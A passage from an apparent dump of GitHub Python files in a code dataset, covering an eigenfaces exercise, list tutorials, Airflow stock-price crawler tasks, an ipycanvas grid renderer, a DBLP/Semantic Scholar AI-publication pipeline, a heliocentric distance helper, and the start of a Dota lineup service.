os\nfrom math import sqrt\n\nimport sys\nsys.path.append('../vectors')\nsys.path.append('../matrix')\nfrom vec import Vec\nfrom mat import Mat\nfrom vecutil import list2vec\nfrom matutil import rowdict2mat, mat2coldict, coldict2mat\n\ndef load_images(path, n = 20):\n    '''\n    Input:\n        - path: path to directory containing img*.png\n        - n: number of images to load\n    Output:\n        - dict mapping numbers 0 to (n-1) to a list of rows,\n          each of which is a list of pixel brightnesses\n    '''\n    return {i:color2gray(file2image(os.path.join(path,\"img%02d.png\" % i))) for i in range(n)}\n\ndef vec2image(vec, rowsCnt, colsCnt):\n    indexes = sorted(list(vec.D))\n    result = []\n    for i in range(rowsCnt):\n        result.append([])\n        for j in range(colsCnt):\n            result[-1].append(vec[i * colsCnt + j])\n\n    return result\n\ndef find_centroid(images):\n    return sum(images.values()) / len(images)\n\ndef center_images(images, centroid):\n    return { key: (val - centroid) for key, val in images.items() }\n\ndef projected_representation(M, x):\n    return M * x\n\ndef projection_length_squared(M, x):\n    repr = projected_representation(M, x)\n    return repr * repr\n\ndef distance_squared(M, x):\n    repr = projected_representation(M, x)\n    return x * x - repr * repr\n\ndef project(M, x):\n    coordinates = projected_representation(M, x)\n    return coordinates * M\n\nraw_images = load_images('./faces')\nrowsCnt = len(raw_images[0])\ncolsCnt = len(raw_images[0][0])\n\nimages = { key: list2vec([ el for row in image for el in row ]) for key, image in raw_images.items() }\ncentroid = find_centroid(images)\ncentered_images = center_images(images, centroid)\nM = rowdict2mat(centered_images)\n\nprint('Factoring...')\nU, E, V = factor(M)\nprint('Done')\nprint(len(U.D[0]), len(U.D[1]))\nprint(len(E.D[0]), len(E.D[1]))\nprint(len(V.D[0]), len(V.D[1]))\nprint(E[0,0], E[1,1], E[2,2], E[3,3])\n\north_basis = rowdict2mat({ key: vec for key, vec in mat2coldict(V).items() if key < 10 })\nprint(len(orth_basis.D[0]), len(orth_basis.D[1]))\nprint(len(centered_images[0].D))\n\nprint({ key: distance_squared(orth_basis, image) for key, image in centered_images.items() })\n\nprint('UNCLASSIFIED')\nraw_images_uncl = load_images('./unclassified', 10)\nimages_uncl = { key: list2vec([ el for row in image for el in row ]) for key, image in raw_images_uncl.items() }\ncentered_images_uncl = center_images(images_uncl, centroid)\n\ndist = { key: distance_squared(orth_basis, image) for key, image in centered_images_uncl.items() }\nmax_dist = max(dist.values())  # renamed to avoid shadowing the builtin max()\ndist = { key: val * 100 / max_dist for key, val in dist.items() }\n\nprint(dist)\n\nprint(\"Eigen Faces\")\n\nfor i in range(10):\n    projection = project(orth_basis, centered_images_uncl[i]) + centroid\n    image2display(vec2image(projection, rowsCnt, colsCnt))\n","repo_name":"AleksandrRogachev94/CodingTheMatrix","sub_path":"svd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39059507923","text":"import sys\nsys.stdin = open('input_russia.txt', 'r')\nN = int(input())\n\nfor tc in range(1, N+1):\n    r, c = map(int, input().split())\n    flag = []\n    for _ in range(r):\n        flag.append(list(map(str, input())))\n    print(flag)\n","repo_name":"91hongppie/algorithm","sub_path":"190919/russia.py","file_name":"russia.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"25196444878","text":"# Using the list() function\nll = list('hello 
list')\nprint(ll)\n\n# List element assignment, e.g. x[3]=5\nx = [1,2,3,4,5]\n# Change the value of the fourth element of the list\nx[3] = 5\nprint(x)\n\n# Deleting elements with del\nnames = ['zhangsan','lisi','wangwu','zhaoliu']\nprint(names)\n# Delete the third element\ndel names[2]\n# The list length finally becomes 3\nprint(names)\n\n\n# Slice assignment\nname = list('python')\nname[2:] = 'wr'\nprint(name)\n\n# Slice replacement with a sequence of a different length\nname_re = list('perl')\n# Replace everything after the first element\nname_re[1:] = list('ython')\nprint(name_re)\n\n# Inserting new elements\nnum = [1,4,5]\n# Insert new elements after the first element\nnum[1:1] = [2,3]\nnum\nprint(num)\n\n# Assign an empty sequence to the slice between the first and third elements, i.e. delete those elements\nnum[1:3] = []\nnum\n# [1, 4, 5]\n\n# Slicing with negative indices\nnum[-1:-1] = [5,5,5]\nprint(num)\n\n\n# List methods: appending content\nlist_append = [1,2,3,4]\nlist_append.append(5)\nprint(list_append)\n\n# Count the occurrences of a value in the list\nnum.count(5)\n\n\n# Count how many times the letter a appears\nname = ['a','a','abf','ark','nhk']\n\nname.count('a')\n\n\n# The extend method\na =[1,2,3]\nb = [4,5,6]\n# Append list b to the end of list a\na.extend(b)\nprint(a)\n\n\n# The index method\ncontent = ['where','who','lisi','cntent','who']\ncontent.index('who')\n\n# The insert method\nnum = [1,2,5,6,7]\nnum.insert(2,3)\nprint(num)\nnum.insert(3,4)\nprint(num)\n\n\n# The pop method\nx = [1,2,3]\nx.pop()\n# 3\nprint(x)\nx.pop()\nprint(x)\n\n# The remove method\ncontent = ['where', 'who', 'lisi', 'cntent', 'who', 'who']\n# Removes the first matching element\ncontent.remove('who')\nprint(content)\n\n\n# The reverse method\nx = [1, 2, 3]\n# Elements stored in reverse order\nx.reverse()\nprint(x)\n\n# The sort method\nx = [2,3,5,6,1,4,7]\nx.sort()\nprint(x)\n\n# The clear method\nlist1 = ['baidu', 'google', 12, 23]\nprint(list1)\nlist1.clear()\nprint(list1)\n\n# The copy method\nlist1 = ['baidu', 'google', 12, 23];\nlist2 = list1.copy()\nprint(list2)\n","repo_name":"JustDoPython/python-100-day","sub_path":"day-008/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"zh","doc_type":"code","stars":699,"dataset":"github-code","pt":"19"} +{"seq_id":"13203141842","text":"import datetime\n\nfrom airflow.operators.python_operator import (\n    PythonOperator,\n)\n\nfrom dataflow.backend import db\nfrom dataflow.crawler.taiwan_stock_price import (\n    crawler,\n)\n\n\ndef crawler_taiwan_stock_price_twse(\n    **kwargs,\n):\n    # Because params are set at the DAG level, parameters can be passed in;\n    # here we therefore fetch them through kwargs as below.\n    # The params key configured in the DAG is date (YYYY-MM-DD),\n    # so the same string must be used when fetching it.\n    params = kwargs[\"dag_run\"].conf\n    date = params.get(\n        \"date (YYYY-MM-DD)\",\n        # if no parameter is given, date defaults to today\n        datetime.datetime.today().strftime(\n            \"%Y-%m-%d\"\n        ),\n    )\n    # run the crawler\n    df = crawler(\n        dict(\n            date=date,\n            data_source=\"twse\",\n        )\n    )\n    # upload the data to the database\n    db.upload_data(\n        df,\n        \"TaiwanStockPrice\",\n        db.router.mysql_financialdata_conn,\n    )\n\n\ndef crawler_taiwan_stock_price_tpex(\n    **kwargs,\n):\n    # same comments as above\n    params = kwargs[\"dag_run\"].conf\n    date = params.get(\n        \"date (YYYY-MM-DD)\",\n        datetime.datetime.today().strftime(\n            \"%Y-%m-%d\"\n        ),\n    )\n    df = crawler(\n        dict(\n            date=date,\n            data_source=\"tpex\",\n        )\n    )\n    db.upload_data(\n        df,\n        \"TaiwanStockPrice\",\n        db.router.mysql_financialdata_conn,\n    )\n\n\ndef create_crawler_taiwan_stock_price_task() -> PythonOperator:\n    return [\n        # create the tasks\n        PythonOperator(\n            task_id=\"taiwan_stock_price_twse\",\n            python_callable=crawler_taiwan_stock_price_twse,\n            queue=\"twse\",\n            provide_context=True,\n        ),\n        PythonOperator(\n            task_id=\"taiwan_stock_price_tpex\",\n            python_callable=crawler_taiwan_stock_price_tpex,\n            queue=\"tpex\",\n            provide_context=True,\n        ),\n    
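# A hypothetical third data source could be wired in the same way (names below are illustrative, not part of this project):\n        # PythonOperator(task_id=\"taiwan_stock_price_other\", python_callable=crawler_taiwan_stock_price_other, queue=\"other\", provide_context=True),\n    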
]\n","repo_name":"FinMind/FinMindBook","sub_path":"DataEngineering/Chapter12/12.8/dataflow/etl/taiwan_stock_price.py","file_name":"taiwan_stock_price.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"9811511735","text":"# creating an empty list\nnumbers=[]\n\nn=int(input(\"Enter no of names you want to input \"))\n\nfor i in range(0,n):\n    element=int(input())\n\n    numbers.append(element)\n\n    print(numbers)","repo_name":"thebinsohail/Python-Workspace","sub_path":"names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20750351104","text":"\nimport numpy as np\nfrom numpy import inf\nfrom ipycanvas import hold_canvas\nfrom findirection.envs.draw_grid import DrawGrid, Level\nfrom findirection.envs.grid_info import GridInfo\nfrom findirection.envs.arrows import Arrows\nfrom findirection.envs.directions import Direction\n\n\nclass DrawInfo():\n\n    arrow_color = '#00008b' \n    text_bg_color = 'rgba(40,40,40,0.7)' \n    text_fg_color = '#fff' \n\n    precision = 3 \n\n\n    def __init__( self, draw_grid: DrawGrid, grid_info: GridInfo, **kwargs: dict ):\n        \n        self.grid = draw_grid.grid\n\n        self.grid_info = grid_info\n\n        self.draw_grid = draw_grid \n        self.canvas = self.draw_grid.canvases[Level.Text]\n\n        self.set_properties(kwargs.get('grid',None)) \n\n        self.arrows = Arrows( draw_grid.cell_pixels, draw_grid.padding,length=24,width=7,height=11) \n\n\n    def draw( self, props: dict ):\n\n        if props is not None: \n            self.precision = props.get('precision', self.precision)\n            directions = props.get('directions',None)\n            if directions is not None: \n                self.process_direction_arrows(directions)\n                self.process_direction_text(directions)\n\n            self.process_text(props)\n\n            self.process_info(props)\n\n            if props.get('coords',False):\n                self.draw_coordinates()\n\n\n\n    def set_default_values(self,args): \n        \n        defaultargs = ((0,0),\"\",190,20)\n\n        args += (None,)*len(defaultargs) \n\n        args = tuple(map(lambda x, y: y if y is not None else x, defaultargs, args))\n        return args\n\n\n    def process_info(self,info):\n\n        fg_color = 'black'\n        bk_color = 'white'\n\n        text = info.get('side_info',None)\n        if text is not None: \n\n            if self.draw_grid.side_panel is None:\n                raise Exception(\"\\'side_panel\\' must be specified during grid creation to allow side panel text.\")\n\n            if type(self.draw_grid.side_panel) == dict:\n                fg_color = self.draw_grid.side_panel.get('text_fg','black') \n                bk_color = self.draw_grid.side_panel.get('color','white') \n\n            if self.draw_grid.side_panel:\n\n                for item in text:\n                    
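# Unpack the (x, y) anchor, label text, and box size, with defaults filled in for any missing fields.\n                    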
(cx,cy),value,width,height = self.set_default_values(item)\n cy += self.draw_grid.height_pixels \n self.clear_info_panel_text( cx, cy, width, height, bk_color)\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n\n cy += self.draw_grid.height_pixels \n self.info_panel_text(cx,cy,value,width,height,fg_color=fg_color,bk_color=bk_color) \n\n\n def process_text(self,info):\n\n text = info.get('text',None) \n if text is not None:\n if isinstance(text,np.ndarray):\n self.draw_text_array(text)\n else:\n for (cx,cy),value in text: \n self.draw_cell_text(cx,cy,value)\n\n\n def process_direction_arrows(self,directions):\n\n arrows = directions.get('arrows',None)\n if arrows is not None:\n if isinstance(arrows,np.ndarray):\n self.draw_direction_arrow_array(arrows) \n else: \n\n if len(arrows) > 0 and (type(arrows[0][0]) == int): \n for (cx,cy) in arrows:\n direction = self.grid_info.get_directions(cx,cy)\n self.draw_direction_arrow(cx,cy,direction) \n\n else:\n for (cx,cy),direction in arrows: \n self.draw_direction_arrow(cx,cy,direction) \n\n\n def process_direction_text(self,directions):\n\n text = directions.get('text',None)\n if text is not None:\n if isinstance(text,np.ndarray):\n self.draw_direction_text_array(text) \n else:\n if len(text) > 0 and (type(text[0][0]) == int): \n for (cx,cy) in text:\n direction = self.grid_info.get_directions(cx,cy)\n self.draw_direction_text(cx,cy,direction) \n\n else:\n for (cx,cy),direction in text: \n self.draw_direction_text(cx,cy,direction) \n\n\n\n def set_properties( self, grid_props: dict ):\n\n if grid_props is not None:\n colors = grid_props.get('colors',None)\n if colors is not None: \n self.arrow_color = colors.get('arrows', self.arrow_color) \n self.text_fg_color = colors.get('text_fg', self.text_fg_color) \n self.text_bg_color = colors.get('text_bg', self.text_bg_color) \n\n\n \n def draw_direction_arrow( self, x, y, directions ): \n \n canvas = self.draw_grid.canvases[Level.Overlay]\n color = self.arrow_color \n padding = self.draw_grid.padding\n cell_pixels = self.draw_grid.cell_pixels\n px,py = self.draw_grid.grid_to_pixels( [x,y], padding, padding ) \n\n with hold_canvas(canvas): \n canvas.clear_rect(px,py,cell_pixels,cell_pixels)\n\n with hold_canvas(canvas): \n self.arrows.draw(canvas,px,py,directions,color) \n\n\n def draw_direction_arrow_array(self, directions: np.array):\n canvas = self.draw_grid.canvases[Level.Overlay] \n with hold_canvas(canvas): \n for y in range(directions.shape[0]):\n for x in range(directions.shape[1]):\n self.draw_direction_arrow( x, y, directions[y,x]) \n\n\n \n def draw_direction_text( self, x, y, direction ):\n self.draw_cell_text( x, y, Direction.get_string(direction) )\n\n\n def draw_direction_text_array(self,directions): \n for y in range(directions.shape[0]):\n for x in range(directions.shape[1]):\n if x != self.grid.end[0] or y != self.grid.end[1]: \n self.draw_direction_text( x, y, directions[y,x]) \n \n\n def draw_coordinates(self):\n with hold_canvas(self.canvas): \n for y in range(self.draw_grid.grid.height):\n for x in range(self.draw_grid.grid.width):\n self.draw_cell_text( x, y, f\"({x},{y})\") \n \n\n\n def draw_text_array(self,text):\n with hold_canvas(self.canvas): \n for y in range(text.shape[0]):\n for x in range(text.shape[1]):\n self.draw_cell_text( x, y, text[y,x]) \n\n\n def info_panel_text( self, x, y, text,width,height, \n fg_color='#000', \n bk_color='#fff',\n font='bold 14px sans-serif',\n text_align='left',\n text_baseline='top'): \n canvas = self.canvas\n 
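# Save the canvas state so the fill/font/alignment changes below stay scoped to this call.\n        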
canvas.save()\n with hold_canvas(canvas): \n canvas.fill_style = fg_color\n canvas.text_align = text_align\n canvas.text_baseline = text_baseline\n canvas.font = font\n canvas.fill_text(text, x, y)\n canvas.restore()\n\n\n def clear_info_panel_text( self, x, y, width, height, bk_color='#fff'):\n canvas = self.canvas\n with hold_canvas(canvas): \n canvas.fill_style = bk_color \n canvas.fill_rect(x,y-5,width,height) \n\n\n def draw_cell_text( self, x, y, value, color = None, back_color = None ): \n num_value = False\n if type(value).__name__.startswith('str'):\n if len(value) == 0:\n return\n elif isinstance(value, (int, float, complex)) and not isinstance(value, bool):\n num_value = True\n if np.isnan(value):\n return\n\n if self.grid.test_for_base_area(x,y): \n return\n \n if isinstance(value, float):\n if self.precision == 0:\n value = int(value)\n else:\n value = round(value,self.precision) \n \n canvas = self.canvas\n padding = self.draw_grid.padding\n\n if color is None: color = self.text_fg_color\n if back_color is None: back_color = self.text_bg_color\n\n gx,gy = self.draw_grid.grid_to_pixels( [x,y], padding, padding ) \n cx,cy = self.draw_grid.get_center(gx,gy) \n\n bk_height = 20\n bk_width = 36\n\n if len(str(value)) > 4:\n bk_width += (len(str(value))-4) * 6\n\n if bk_width > (self.draw_grid.cell_pixels - 4):\n bk_width = (self.draw_grid.cell_pixels - 4)\n\n x_off = (bk_width//2)\n y_off = (bk_height//2)\n\n font_size = 14\n text_offset = 5\n if (num_value and self.precision > 1) or \\\n (not num_value and len(str(value)) >= 3):\n font_size = 12 \n text_offset = 4\n font_str = f\"bold {font_size}px sans-serif\"\n\n canvas.save()\n\n with hold_canvas(canvas): \n canvas.clear_rect(cx-x_off,cy-y_off,bk_width,bk_height) \n if back_color is not None:\n canvas.fill_style = back_color \n canvas.fill_rect(cx-x_off,cy-y_off,bk_width,bk_height) \n\n with hold_canvas(canvas): \n canvas.fill_style = color\n canvas.text_align = 'center'\n canvas.font = font_str\n canvas.fill_text(f\"{value}\", cx, cy+text_offset)\n\n canvas.restore()","repo_name":"arman-zhumakhan/arman-zhumakhan.github.io","sub_path":"projects/reinforcement-learning-project/findirection/envs/draw_info.py","file_name":"draw_info.py","file_ext":"py","file_size_in_byte":10717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10663816718","text":"import urllib.request\nimport shutil\nimport gzip\nimport json\nimport os\nimport re\nfrom collections import defaultdict\n\nfrom tqdm import tqdm\n\nfrom dblp_parser import parse_dblp, parse_dblp_person, get_dblp_country\n\nDATA_PATH = \"../data/\"\nDBLP_URL = 'https://dblp.org/xml/'\nSEMANTIC_SCHOLAR_URL = 'https://s3-us-west-2.amazonaws.com/ai2-s2-research-public/open-corpus/2020-01-01/'\n\n\ndef download_dblp() -> None:\n \"\"\"\n This function downloads the DBLP XML and DTD.\n \"\"\"\n source_gz = DBLP_URL + 'release/dblp-2020-01-01.xml.gz'\n source_dtd = DBLP_URL + 'release/dblp-2019-11-22.dtd'\n target_gz = DATA_PATH + 'dblp.xml.gz'\n target_dtd = DATA_PATH + 'dblp-2019-11-22.dtd'\n\n print('Downloading file ' + source_gz)\n with urllib.request.urlopen(source_gz) as response, open(target_gz, 'wb') as fh:\n shutil.copyfileobj(response, fh)\n print('Downloading file ' + source_dtd)\n with urllib.request.urlopen(source_dtd) as response, open(target_dtd, 'wb') as fh:\n shutil.copyfileobj(response, fh)\n print('Download finished!')\n print()\n\n\ndef unzip_dblp() -> None:\n \"\"\"\n This function unzips the DBLP dataset.\n 
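The download_dblp routine above streams each HTTP response to disk through shutil.copyfileobj rather than reading it into memory first, which matters for a multi-gigabyte XML dump. A sketch of the same pattern with an explicit buffer size (the URL and target path are placeholders, not values from the pipeline):

import shutil
import urllib.request

def stream_download(url: str, target: str, chunk_bytes: int = 1 << 20) -> None:
    # copyfileobj copies chunk_bytes at a time; response.read() would
    # instead buffer the entire payload before the first write.
    with urllib.request.urlopen(url) as response, open(target, 'wb') as fh:
        shutil.copyfileobj(response, fh, chunk_bytes)

# stream_download('https://example.org/dblp.xml.gz', '/tmp/dblp.xml.gz')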
\"\"\"\n source = DATA_PATH + 'dblp.xml.gz'\n target = DATA_PATH + 'dblp.xml'\n\n with gzip.open(source, 'rb') as f_in:\n with open(target, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n print()\n\n\ndef extract_publications() -> None:\n \"\"\"\n Reading the DBLP XML and parse it into a json file for further processing.\n \"\"\"\n source = DATA_PATH + 'dblp.xml'\n target = DATA_PATH + 'dblp.json'\n\n print('Parsing ' + source)\n parse_dblp(source, target)\n print('Parse finish! File dblp.json created!')\n print()\n\n\ndef extract_ai_publications(source: str = DATA_PATH + 'dblp.json',\n target: str = DATA_PATH + 'ai_dblp.json') -> set:\n \"\"\"\n Extracting the AI publications from the DBLP dataset.\n :param source: From where to read the pubs.\n :param target: Where to write the pubs to.\n :return: List of authors, which have published an AI publication\n \"\"\"\n source_venues = DATA_PATH + '../ai_venues.json'\n\n with open(source_venues, \"r\", encoding=\"utf-8\") as f:\n venues = json.load(f)\n venues = {a for b in venues.values() for a in b}\n\n authors = set()\n with open(target, \"w\", encoding=\"utf-8\") as out_f:\n with open(source, \"r\", encoding=\"utf-8\") as in_f:\n for line in tqdm(in_f):\n line = json.loads(line)\n if line['booktitle']:\n curr_venue = line['booktitle'][0]\n elif line['journal']:\n curr_venue = line['journal'][0]\n else:\n continue\n curr_venue = re.sub(\" \\\\([0-9]+\\\\)$\", \"\", curr_venue)\n if curr_venue in venues:\n line['venue'] = curr_venue\n json.dump(line, out_f)\n out_f.write(\"\\n\")\n authors.update(line['author'])\n print('Parse finish! File created!')\n print()\n return authors\n\n\ndef extract_persons(author_set: set) -> None:\n \"\"\"\n Extracting person information from DBLP and write it down.\n Note that we exclude person records that have the\n publtype disambiguation.\n :param author_list: A list of authors,\n which have published an AI publication\n \"\"\"\n source = DATA_PATH + 'dblp.xml'\n target = DATA_PATH + 'persons.json'\n\n print('Parsing ' + source)\n parse_dblp_person(source, target, author_set)\n print('Parse finish! File persons.json created!')\n print()\n\n\ndef parse_countries():\n \"\"\"\n Extracting countries for all authors in the AI DBLP.\n Countries are found using a possible country file.\n \"\"\"\n source_person = DATA_PATH + 'persons.json'\n source_country = DATA_PATH + '../poss_countries.txt'\n target = DATA_PATH + 'author_countries.json'\n\n get_dblp_country(source_person, source_country, target)\n print('Parse finish! 
File author_countries.json created!')\n print()\n\n\ndef extract_community_publications() -> None:\n \"\"\"\n Extracts all publications that have at least one author\n that we consider as an AI author.\n \"\"\"\n source = DATA_PATH + 'dblp.json'\n source_persons = DATA_PATH + 'persons.json'\n target_pubs = DATA_PATH + \"ai_community_dblp.json\"\n with open(source_persons, encoding=\"utf-8\") as file:\n persons = [json.loads(line) for line in file]\n # Put all author names into set\n authors = {}\n for person in persons:\n author_name = person[\"author\"]\n if isinstance(author_name, list):\n for a in author_name:\n authors[a] = person[\"key\"]\n elif isinstance(author_name, str):\n authors[author_name] = person[\"key\"]\n with open(target_pubs, \"w\", encoding=\"utf-8\") as out_f:\n with open(source, \"r\", encoding=\"utf-8\") as in_f:\n for line in tqdm(in_f):\n line = json.loads(line)\n if \"author\" in line:\n matched_authors = [a for a in line[\"author\"]\n if a in authors]\n if matched_authors:\n line[\"ai_authors\"] = matched_authors\n line[\"ai_authors_keys\"] = [authors[author] for author\n in matched_authors]\n json.dump(line, out_f)\n out_f.write(\"\\n\")\n print(\"Finished community_dblp.json file!\")\n print()\n\n\n# --- Helper for Extract Semantic scholar ---\ndef download_semantic_scholar_if_needed(semantic_scholar_path: str,\n default_count: int = 181) -> None:\n \"\"\"\n Helper file for match semantic scholar. Downloads the whole corpus.\n \"\"\"\n if not os.path.exists(semantic_scholar_path):\n os.mkdir(semantic_scholar_path)\n with urllib.request.urlopen(SEMANTIC_SCHOLAR_URL + \"manifest.txt\") as response:\n with open(semantic_scholar_path + \"manifest.txt\", 'wb') as fh:\n shutil.copyfileobj(response, fh)\n with open(semantic_scholar_path + \"/manifest.txt\", \"r\") as f:\n for line in tqdm(f, total=default_count):\n line = line.strip()\n with urllib.request.urlopen(SEMANTIC_SCHOLAR_URL + line) as response:\n with open(semantic_scholar_path + line, 'wb') as fh:\n shutil.copyfileobj(response, fh)\n\n\ndef get_doi(line) -> str:\n \"\"\"\n Get doi for a given line of the data, useful for semantic_scholar matching\"\n \"\"\"\n if \"ee\" in line:\n for x in line[\"ee\"]:\n if \"doi\" in x:\n return x.replace(\"https://doi.org/\", \"\")\n\n\ndef match_semantic_scholar() -> None:\n \"\"\"\n Match all the publications to Semantic Scholar. Also downloads Semantic Scholar\n if needed. Writes the matched data to ai_community_dataset.json\n \"\"\"\n source = DATA_PATH + 'ai_community_dblp.json'\n target = DATA_PATH + 'ai_community_dataset.json'\n semantic_scholar_path = DATA_PATH + \"semantic_scholar/\"\n download_semantic_scholar_if_needed(semantic_scholar_path)\n\n with open(source, \"r\", encoding=\"utf-8\") as f:\n pubs = f.readlines()\n pubs = [json.loads(x) for x in pubs]\n removed_indices = set()\n titles = defaultdict(list)\n [titles[x['title'].strip(\".\").lower()].append(i)\n for i, x in enumerate(pubs)]\n files = [file_path for file_path in os.listdir(semantic_scholar_path)\n if \"s2-corpus-\" in file_path]\n counter = 1\n with open(target, 'w', encoding=\"utf-8\") as out_f:\n for file_path in files:\n print(\"Reading file ... 
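Back in extract_ai_publications, venue strings are normalized with re.sub(" \\([0-9]+\\)$", "", ...) before the whitelist lookup, because DBLP appends a numeric disambiguation suffix to some venue names. The normalization in isolation (the venue strings here are invented examples):

import re

def normalize_venue(venue: str) -> str:
    # ' (2)'-style suffixes should not defeat the set membership test
    return re.sub(r' \([0-9]+\)$', '', venue)

assert normalize_venue('ICANN (2)') == 'ICANN'
assert normalize_venue('AAAI') == 'AAAI'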
(\",\n str(counter), \"/\",\n str(len(files)), \")\")\n with gzip.open(semantic_scholar_path + file_path,\n 'rt',\n encoding=\"utf-8\") as in_f:\n for line in in_f:\n line = json.loads(line)\n curr_title = line['title'].strip().lower()\n if curr_title in titles:\n index = None\n for i in titles[curr_title]:\n pub = pubs[i]\n doi = get_doi(pub)\n if doi and \"doi\" in line and line[\"doi\"]:\n if doi == line[\"doi\"]:\n index = i\n break\n elif \"year\" in line and int(pub[\"year\"]) == int(line[\"year\"]):\n if line[\"venue\"] == \"ArXiv\":\n if pub[\"journal\"] and pub[\"journal\"][0] == \"CoRR\":\n index = i\n break\n elif pub[\"journal\"] and pub[\"journal\"][0] == \"CoRR\":\n continue\n else:\n index = i\n break\n if index and index not in removed_indices:\n if 'abstract' not in pub:\n pub['abstract'] = line['paperAbstract']\n if 'in_citations' not in pub:\n pub['in_citations'] = line['inCitations']\n if 'out_citations' not in pub:\n pub['out_citations'] = line['outCitations']\n if 'ss_id' not in pub:\n pub['ss_id'] = line['id']\n if 'doi' not in pub and 'doi' in line:\n pub['doi'] = [line['doi']]\n json.dump(pub, out_f)\n out_f.write(\"\\n\")\n removed_indices.add(index)\n counter += 1\n for i, pub in enumerate(pubs):\n if i not in removed_indices:\n json.dump(pub, out_f)\n out_f.write(\"\\n\")\n print(\"Finished. \")\n\n\ndef extract_german_ai(source: str = DATA_PATH + 'ai_community_dataset.json',\n target: str = DATA_PATH + 'german_ai_community_dataset.json') -> None:\n \"\"\"\n Extracts all publications in which at least one author is flagged as\n german.\n \"\"\"\n countries = DATA_PATH + 'author_countries.json'\n with open(countries, \"r\", encoding=\"utf-8\") as f:\n countries = f.readlines()\n countries = [json.loads(x) for x in countries]\n german_authors = [(x['author'], x['key']) for x in countries\n if \"Germany\" in x[\"countries\"]]\n german_names = {}\n for author, dblp_id in german_authors:\n if isinstance(author, list):\n for aut in author:\n german_names[aut] = dblp_id\n elif isinstance(author, str):\n german_names[author] = dblp_id\n with open(source, \"r\", encoding=\"utf-8\") as in_f:\n with open(target, \"w\", encoding=\"utf-8\") as out_f:\n for line in tqdm(in_f):\n line = json.loads(line)\n german_as = [auth for auth in line[\"ai_authors\"]\n if auth in german_names]\n if german_as:\n line[\"german_ai_authors\"] = german_as\n line[\"german_ai_authors_keys\"] = [german_names[name]\n for name in german_as]\n json.dump(line, out_f)\n out_f.write(\"\\n\")\n print(\"Finished extracting german AI publications. 
\")\n\n\ndef extrat_german_persons(person_source: str = DATA_PATH + 'persons.json',\n data_source : str = DATA_PATH + 'german_ai_community_dataset.json',\n target : str = DATA_PATH + 'german_persons.json') -> None:\n \"\"\"\n Writes all german authors into an author file.\n \"\"\"\n german_keys = set()\n with open(data_source) as file:\n for line in file:\n line = json.loads(line)\n german_keys.update(line[\"german_ai_authors_keys\"])\n with open(target, 'w') as out_file:\n with open(person_source) as in_file:\n for line in in_file:\n line = json.loads(line)\n if line[\"key\"] in german_keys:\n json.dump(line, out_file)\n out_file.write(\"\\n\")\n print(\"Finished extracting all german AI authors!\")\n\n\nif __name__ == '__main__':\n print('**** Starting pipeline process to create AI Datasets****')\n print()\n if not os.path.isdir(DATA_PATH):\n os.makedirs(DATA_PATH)\n\n print('Process 01 - Download dblp data')\n download_dblp()\n\n print('Process 02 - Unzipping dblp data')\n unzip_dblp()\n\n print('Process 03 - Create dblp.json')\n extract_publications()\n\n print('Process 04 - Create ai_dblp.json')\n author_set = extract_ai_publications()\n\n print('Process 05 - Create persons.json')\n extract_persons(author_set)\n\n print('Process 06 - Create author_countries.json')\n parse_countries()\n\n print(\"Process 07 - Create ai_community_dblp.json\")\n extract_community_publications()\n\n print('Process 08 - Extract Semantic scholar information for the AI community.')\n match_semantic_scholar()\n\n print('Process 09 - Extract Semantic scholar information for the AI data')\n # Just filter relevant publications from the AI community dataset, no\n # need for going throguh Semantic Scholar again.\n extract_ai_publications(source=DATA_PATH+'ai_community_dataset.json',\n target=DATA_PATH+'ai_dataset.json')\n\n print('Process 10 - Extract publications from German AI authors.')\n extract_german_ai()\n extract_german_ai(source=DATA_PATH + 'ai_dataset.json',\n target=DATA_PATH + 'german_ai_dataset.json')\n\n print('Process 11 - Extract German AI authors')\n extrat_german_persons()\n\n print('*** Pipeline process to create the data sets finished! 
***')\n","repo_name":"TobiasKoopmann/ai-network","sub_path":"Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"15404750819","text":"import numpy as np\n\ndef geo2helio(r_so,rhat_ob,d):\n\t\"\"\"\n\tReturn the scalar multiplier for 'rhat_ob' that yields an 'r_so' of length 'd'\n\tNB: a=1 so we can omit it from calcs\n\t\"\"\"\n\n\tis_arr = isinstance(rhat_ob,np.ndarray) and rhat_ob.ndim==2\n\n\tif is_arr:\n\t\tb = 2*np.sum(r_so*rhat_ob,axis=1)\n\t\tc = -1*(d**2 - np.sum(r_so*r_so,axis=1))\n\telse:\n\t\tb = 2*np.dot(rhat_ob,r_so)\n\t\tc = -1*(d**2 - np.dot(r_so,r_so))\n\n\ts = np.sqrt(b**2 - 4*c)\n\tr0 = (-b + s)/2.0\n\tr1 = (-b - s)/2.0\n\n\tif is_arr:\n\t\talpha = np.max(np.vstack((r0,r1)).T,axis=1)\n\t\talpha[alpha<0] = np.nan\n\telse:\n\t\talpha = np.max((r0,r1))\n\t\tif alpha<0:\n\t\t\talpha = np.nan\n\n\treturn alpha\n","repo_name":"bengebre/geo2helio","sub_path":"geo2helio.py","file_name":"geo2helio.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3103313404","text":"import models\n\nclass LineupService:\n def create_lineups(self, match_json):\n dire = []\n radiant = []\n\n if('players' in match_json):\n heroes = match_json['players']\n count = 0\n\n for hero in heroes:\n if count < 5:\n radiant.append(hero['hero_id'])\n else:\n dire.append(hero['hero_id'])\n count += 1\n else:\n radiant_heroes = match_json['radiant']['heroes']\n dire_heroes = match_json['dire']['heroes']\n\n for hero in radiant_heroes:\n 